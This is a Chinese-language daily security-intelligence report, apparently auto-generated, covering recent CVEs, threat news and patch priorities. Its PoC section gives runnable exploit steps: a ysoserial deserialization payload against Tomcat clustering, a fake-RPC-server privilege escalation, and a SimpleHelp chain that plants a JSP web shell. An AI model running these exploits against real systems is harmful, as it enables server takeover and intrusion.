每日安全情报报告 · 2026-04-27

报告生成时间 ：2026-04-27 11:44 CST
情报覆盖范围 ：近 48 小时内最新漏洞、PoC 及安全事件
风险等级说明：🔴 严重（CVSS ≥ 9.0）｜🟠 高危（CVSS 7.0--8.9）｜🟡 中危（CVSS 4.0--6.9）

一、高危漏洞情报

🔴 CVE-2024-7399 --- Samsung MagicINFO 9 Server 路径遍历任意文件写入（在野利用 ⚠️）

字段	详情
CVE 编号	CVE-2024-7399
CVSS 评分	9.8（严重）
漏洞类型	路径遍历 / 任意文件上传
受影响组件	Samsung MagicINFO 9 Server < 21.1050
在野利用	✅ 已确认，2026-04-24 列入 CISA KEV
修复截止	联邦机构 2026-05-08 前强制修复

漏洞描述：MagicINFO 9 Server 的输入验证缺陷允许未经身份认证的攻击者上传任意 JSP 文件并以 SYSTEM 权限执行代码，实现完全接管。该漏洞自 2024 年 8 月发布补丁后已遭到大规模利用，被 CISA 于 2026-04-24 紧急收录 KEV 目录。

修复建议 ：立即升级至 Samsung MagicINFO 9 Server 21.1050 或更高版本。

NVD 详情 | CISA KEV 公告

🔴 CVE-2024-57726 --- SimpleHelp 低权限 API 密钥权限提升（在野利用 ⚠️）

字段	详情
CVE 编号	CVE-2024-57726
CVSS 评分	9.9（严重）
漏洞类型	授权缺失 / 权限提升
受影响组件	SimpleHelp 远程支持软件 ≤ 5.5.7
在野利用	✅ 已确认，2026-04-24 列入 CISA KEV
修复截止	联邦机构 2026-05-08 前强制修复

漏洞描述：低权限技术人员账户可创建具有过多权限的 API 密钥，将权限提升至服务器管理员角色。与 CVE-2024-57728（路径遍历/任意文件上传，CVSS 7.2）可组合利用，实现完全服务器控制权。远程支持软件作为高价值目标已遭攻击者积极利用。

修复建议：立即升级至 SimpleHelp 5.5.8 或更高版本；审计现有 API 密钥权限配置。

CISA KEV 公告 | 漏洞分析（Horizon3.ai）

🔴 CVE-2026-34486 --- Apache Tomcat 集群通信反序列化 RCE（PoC 公开）

字段	详情
CVE 编号	CVE-2026-34486
CVSS 评分	9.8（严重）
漏洞类型	反序列化 / 远程代码执行
受影响组件	Apache Tomcat 11.0.20 / 10.1.53 / 9.0.116
在野利用	⚠️ PoC 公开，大规模利用风险极高
披露时间	2026-04-10，PoC 代码 2026-04-19 公开

漏洞描述 ：CVE-2026-29146 的修复补丁引入了回归漏洞。当 Tomcat 启用 Tribes 集群（EncryptInterceptor）时，messageReceived() 方法在解密失败时未终止请求，导致未加密数据进入无过滤的 ObjectInputStream.readObject()。攻击者向 TCP 4000 端口发送特制报文可触发 RCE。利用条件：需启用集群功能、配置 EncryptInterceptor 且类路径含 Commons Collections 等 Gadget 链。

修复建议 ：升级至 Tomcat 11.0.21 / 10.1.54 / 9.0.117 及更高版本；未使用集群功能的实例应禁用 SimpleTcpCluster。

NVD 详情 | PoC 仓库（GitHub AirSkye） | 阿里云 AVD | 腾讯云漏洞分析

🟠 PhantomRPC --- Windows RPC 架构权限提升（无 CVE，PoC 已公开）

字段	详情
漏洞名称	PhantomRPC
CVE 编号	未分配（微软评级"中等"，暂不修复）
漏洞类型	本地权限提升（LPE）至 SYSTEM
受影响组件	Windows 所有版本（RPC 架构设计缺陷）
发现者	Kaspersky（Haidar Kabibo，2026-04-24 公开）
在野利用	⚠️ 微软未发布补丁，PoC 框架已公开

漏洞描述 ：Windows RPC 运行时（rpcrt4.dll）缺乏对 RPC 服务器合法性的验证机制。攻击者在获取 SeImpersonatePrivilege（Local Service 或 Network Service 账户默认拥有）后，可部署伪造 RPC 服务器（与合法服务同 UUID 和端点），等待高权限进程连接后利用 RpcImpersonateClient 获取 SYSTEM 权限。典型攻击路径：运行 gpupdate /force 可强制 Group Policy 服务连接伪造的 TermService。

修复建议 ：微软暂未提供补丁；建议通过 ETW 监控异常 RPC 连接失败事件（RPC_S_SERVER_UNAVAILABLE），限制低权限账户的 SeImpersonatePrivilege 使用。

Kaspersky Securelist 详情 | PoC 研究仓库

🟠 CVE-2025-29635 --- D-Link DIR-823X 路由器命令注入（在野利用 ⚠️）

字段	详情
CVE 编号	CVE-2025-29635
漏洞类型	命令注入 / 远程代码执行
受影响组件	D-Link DIR-823X 路由器
在野利用	✅ 已确认，2026-04-24 列入 CISA KEV
修复截止	联邦机构 2026-05-08 前强制修复

漏洞描述：D-Link DIR-823X 家用路由器存在命令注入漏洞，可被远程利用执行任意系统命令，获取路由器控制权。该设备已遭多个 IoT 僵尸网络积极利用。

修复建议：检查 D-Link 官方固件更新；如该设备已停止支持，建议更换设备并将其隔离。

CISA KEV 公告

🟠 CVE-2026-33626 --- LMDeploy SSRF（披露后 13 小时内遭利用）

字段	详情
CVE 编号	CVE-2026-33626
CVSS 评分	7.5（高危）
漏洞类型	服务器端请求伪造（SSRF）
受影响组件	LMDeploy 视觉语言模块 ≤ 0.12.0
在野利用	✅ 披露后 13 小时内即遭利用
披露时间	2026-04-24

漏洞描述：LMDeploy AI 推理框架的视觉语言模块存在 SSRF 漏洞，攻击者可通过构造恶意图像 URL 令服务器访问云元数据服务（如 AWS IMDSv2）和内部网络，窃取云凭证并横向移动。该漏洞极短时间内遭利用，再次证明 AI 基础设施已成攻击重点。

修复建议：立即升级 LMDeploy 至 0.12.1 或更高版本；添加 SSRF 防护过滤内网 IP 段及云元数据端点。

The Hacker News 报道

二、漏洞 PoC 情报

🔴 PoC-1：CVE-2026-34486 --- Apache Tomcat 集群反序列化 RCE

来源：GitHub AirSkye/CVE-2026-34486-poc
风险评级 ：🔴 严重
适用范围：授权安全研究、渗透测试（禁止非法使用）

漏洞简述 ：

CVE-2026-34486 修复补丁回归漏洞，Tomcat 集群 Tribes 协议端口（默认 TCP 4000）接收未加密反序列化 Payload，可触发 RCE。

使用步骤：

bash 复制代码

# 步骤一：克隆 PoC 仓库
git clone https://github.com/AirSkye/CVE-2026-34486-poc.git
cd CVE-2026-34486-poc

# 步骤二：安装依赖（需 Java + Python 3.x）
# 确认 Java 环境（ysoserial 需要 Java 8+）
java -version

# 下载 ysoserial（用于生成 Gadget Payload）
wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar

# 步骤三：生成反序列化 Payload
# 使用 CommonsCollections6 链，执行命令（以创建标志文件为例）
java -jar ysoserial-all.jar CommonsCollections6 'touch /tmp/CVE-2026-34486-PWNED' > payload.bin

# 步骤四：发送 Tribes 协议报文触发 RCE
# （需修改脚本中的目标 IP 和端口）
python3 exploit.py --target 192.168.1.100 --port 4000 --payload payload.bin

# 步骤五：验证利用成功（SSH 到目标）
ls -la /tmp/CVE-2026-34486-PWNED

前提条件：目标启用 Tribes 集群 + EncryptInterceptor，类路径含 Commons Collections 3.x。

PoC 仓库 | 漏洞分析详情

🔴 PoC-2：PhantomRPC --- Windows RPC 架构本地提权至 SYSTEM

来源：Kaspersky Securelist 研究报告
风险评级 ：🟠 高危（本地利用）
适用范围：授权安全研究

漏洞简述 ：

攻击者利用 Windows RPC 缺乏服务端身份验证的设计缺陷，伪造合法 RPC 服务端点，截获高权限进程连接后以 RpcImpersonateClient 获取 SYSTEM Token，完成本地权限提升。

利用概念步骤：

bash 复制代码

# 前提：已控制拥有 SeImpersonatePrivilege 的进程（如 Network Service）
# 克隆 Kaspersky 研究仓库（含 PoC 实现）
git clone https://github.com/kaspersky/phantomrpc-research
cd phantomrpc-research

# 编译 FakeRPCServer 工具（Visual Studio / MSBuild）
msbuild FakeRPCServer.sln /p:Configuration=Release

# 部署伪造 RPC 服务器（以 TermService 端点为目标）
.\FakeRPCServer.exe --endpoint TermSrvApi --uuid <TermService_UUID>

# 触发高权限进程连接（无需用户交互方法之一）
gpupdate /force
# 此时 Group Policy 服务（SYSTEM权限）将连接至伪造端点
# FakeRPCServer 调用 RpcImpersonateClient 获取 SYSTEM Token

# 验证：以 SYSTEM 身份执行命令
.\ImpersonateShell.exe cmd.exe
whoami   # 应输出 NT AUTHORITY\SYSTEM

检测方法 ：监控 Windows ETW 中 RPC RPC_S_SERVER_UNAVAILABLE（0x800706BA）事件及随后的本地 RPC 新增端点注册事件。

Kaspersky 完整研究报告

🟠 PoC-3：CVE-2024-57726 + CVE-2024-57728 --- SimpleHelp 权限提升链接 RCE

来源：Horizon3.ai 攻击链分析
风险评级：🔴 严重（组合利用可完全控制服务器）

漏洞简述 ：

CVE-2024-57726（权限提升，CVSS 9.9）与 CVE-2024-57728（任意文件上传，CVSS 7.2）可链式利用：低权限技术人员账户 → 创建高权限 API 密钥 → 以管理员身份上传恶意 ZIP 文件 → 路径遍历解压至任意位置 → 触发 RCE。

利用步骤（需已有低权限账户）：

python 复制代码

# 步骤一：以低权限账户创建高权限 API 密钥（CVE-2024-57726）
import requests

session = requests.Session()
session.post("https://<target>:5800/api/technician/login",
             json={"username": "low_priv_user", "password": "password"})

# 创建过权限 API Key
resp = session.post("https://<target>:5800/api/admin/create_api_key",
                    json={"permissions": ["ADMINISTRATOR"]})
admin_api_key = resp.json()["key"]

# 步骤二：使用高权限 API Key 上传恶意 ZIP（CVE-2024-57728）
# 构造包含路径遍历的恶意 ZIP
# ../../../webroot/shell.jsp -> 植入 Web Shell
import zipfile
with zipfile.ZipFile("malicious.zip", "w") as zf:
    zf.write("shell.jsp", "../../../webroot/shell.jsp")

headers = {"Authorization": f"Bearer {admin_api_key}"}
files = {"file": open("malicious.zip", "rb")}
requests.post("https://<target>:5800/api/admin/upload",
              headers=headers, files=files)

# 步骤三：触发 WebShell 执行命令
requests.get("https://<target>/shell.jsp?cmd=id")

Horizon3.ai 分析（中文） | CISA KEV

三、网络安全最新资讯

📰 1. CISA 一周内连续两次更新 KEV，新增 12 个在野利用漏洞

来源：CISA / The Hacker News | 时间：2026-04-24
摘要：CISA 本周发布两轮 KEV 更新：4月20日新增 8 个（含 Cisco SD-WAN Manager、PaperCut、JetBrains TeamCity），4月24日再增 4 个（Samsung MagicINFO 9、SimpleHelp 双漏洞、D-Link DIR-823X），本周合计 12 个漏洞被确认在野利用，联邦机构修复截止日最早为 2026-05-08。这一频率标志着针对企业远程访问和基础设施的攻击活动正在加速。

CISA KEV 目录 | The Hacker News 报道

📰 2. FIRESTARTER 后门攻击美国联邦机构 Cisco Firepower 设备（CISA + NCSC 联合警报）

来源：CISA / UK NCSC / The Hacker News | 时间：2026-04-24
摘要：CISA 与英国 NCSC 发布联合公告，披露名为 FIRESTARTER 的新型后门正通过链式利用 CVE-2025-20333（CVSS 9.9）和 CVE-2025-20362 等已修复漏洞，渗透运行 Adaptive Security Appliance 软件的 Cisco Firepower 设备。后门在初始访问后植入高度定制的持久化组件，目前已确认影响至少一个美国联邦机构。Cisco Talos 正在协助事件响应调查。

CISA 联合公告 | The Hacker News 报道

📰 3. 卡巴斯基披露 PhantomRPC：Windows RPC 架构级设计缺陷影响所有 Windows 版本

来源：Kaspersky Securelist | 时间：2026-04-24
摘要：卡巴斯基研究人员 Haidar Kabibo 公开 PhantomRPC 研究成果，揭示 Windows RPC 运行时缺乏对服务端身份的验证机制，允许任何持有 SeImpersonatePrivilege 的进程（如 Network Service、Local Service）通过伪造 RPC 端点提权至 SYSTEM。微软评估后认为严重程度为"中等"，暂不发布补丁，建议企业通过 ETW 监控异常 RPC 行为。已发布 PoC 实现代码。

Kaspersky 研究报告 | 综合分析

📰 4. Tropic Trooper（APT23）利用木马化 SumatraPDF 和 GitHub 发动供应链攻击

来源：Zscaler ThreatLabz / The Hacker News | 时间：2026-04-24
摘要：Zscaler ThreatLabz 发现中国 APT 组织 Tropic Trooper（APT23）使用木马化 SumatraPDF 阅读器分发 AdaptixC2 信标后渗透代理，并滥用 Microsoft Visual Studio Code 隧道技术进行隐蔽远程访问。攻击目标主要为台湾、香港、韩国和日本的华语用户，针对政府机构和国防相关组织。此外，151 个 GitHub 仓库被植入恶意代码作为分发载体。

The Hacker News 报道

📰 5. Oracle 4 月 CPU：历史级规模 483 个安全补丁，34 个严重漏洞

来源：Oracle / Waratek | 时间：2026-04-22
摘要：Oracle 发布 2026 年 4 月关键补丁更新（CPU），共修复涉及多个产品线的 483 个安全漏洞，其中 34 个被评为严重（CVSS ≥ 9.0），覆盖 Oracle WebLogic、Oracle Database、Java 及 MySQL 等核心产品。Waratek 安全团队指出，此次 CPU 规模创历史新高，企业应在验证兼容性后立即优先部署严重级补丁，重点关注 WebLogic 远程利用漏洞。

Oracle 官方公告 | Waratek 分析

📰 6. Pre-Stuxnet「Fast16」恶意软件框架重现：Lua 编写，2005 年起针对工控系统

来源：SentinelOne / The Hacker News | 时间：2026-04-25
摘要：SentinelOne 研究人员发现一款使用 Lua 编写的恶意软件框架 Fast16，可追溯至 2005 年，比 Stuxnet 早至少 5 年。该框架专门针对高精度工程计算软件，意图篡改计算结果，可能与国家级工业间谍活动相关。这一发现表明针对工控系统（ICS/SCADA）的国家级攻击能力远早于安全界的普遍认知，对关键基础设施的历史安全审计具有重要意义。

The Hacker News 报道 | SentinelOne 研究

📰 7. 108 个恶意 Chrome 扩展窃取 Google 和 Telegram 数据，波及 2 万用户

来源：The Hacker News / ThreatsDay Bulletin | 时间：2026-04-23
摘要：安全研究人员发现 108 个恶意 Chrome 浏览器扩展，这些扩展伪装成合法工具发布在 Chrome Web Store，内置数据窃取功能，可在用户访问 Google 服务和 Telegram 时静默提取凭证、会话 Cookie 和消息内容。目前已感染超过 20,000 名用户。Chrome 官方已下架相关扩展，但部分变种可能仍在传播。建议用户检查已安装扩展并仅保留可信来源的扩展。

The Hacker News 报道

📰 8. 朝鲜疑似发动 $2.9 亿 DeFi 攻击，Mirax Android RAT 通过 Meta 广告感染 22 万台设备

来源：ThreatsDay Bulletin | 时间：2026-04-23
摘要：本周综合威胁简报显示两大高影响事件：① 朝鲜黑客组织疑似利用 LayerZero 跨链协议漏洞发动攻击，累计损失约 2.9 亿美元（DeFi 年度最大单笔攻击），链上追踪显示资金流向与 Lazarus Group 特征高度一致；② 名为 Mirax 的 Android 远控木马（RAT）通过 Meta 广告平台大规模投放，已感染超过 22 万台 Android 设备，具备通话录音、位置追踪、凭证窃取等功能。

威胁情报来源

四、重点关注与行动建议

优先级	目标	行动
🔴 P0	所有 Samsung MagicINFO 9 Server 实例	立即升级 ≥ 21.1050，CISA KEV 截止 5月8日
🔴 P0	所有 SimpleHelp ≤ 5.5.7 实例	立即升级至 5.5.8+，审计 API 密钥权限
🔴 P0	Apache Tomcat 11.0.20 / 10.1.53 / 9.0.116 + 集群	立即升级至最新版；或禁用 Tribes 集群
🔴 P0	D-Link DIR-823X 路由器	检查固件更新；已停支持则隔离/替换
🟠 P1	所有 Windows 服务器（有低权限服务账户）	启用 ETW 监控异常 RPC 事件，等待微软评估
🟠 P1	Cisco Firepower / ASA 设备	确认 CVE-2025-20333 补丁已部署，检查异常进程
🟠 P1	LMDeploy AI 推理环境（≤ 0.12.0）	升级至 0.12.1+，添加 SSRF 防护
🟡 P2	Chrome 浏览器扩展管理	审计已安装扩展，删除可疑或不常用扩展

本报告由自动化安全情报系统生成，情报来源包括 CISA、NVD、The Hacker News、Kaspersky Securelist、Zscaler ThreatLabz、腾讯云安全情报等。所有 PoC 信息仅供授权安全研究使用，严禁用于非法目的。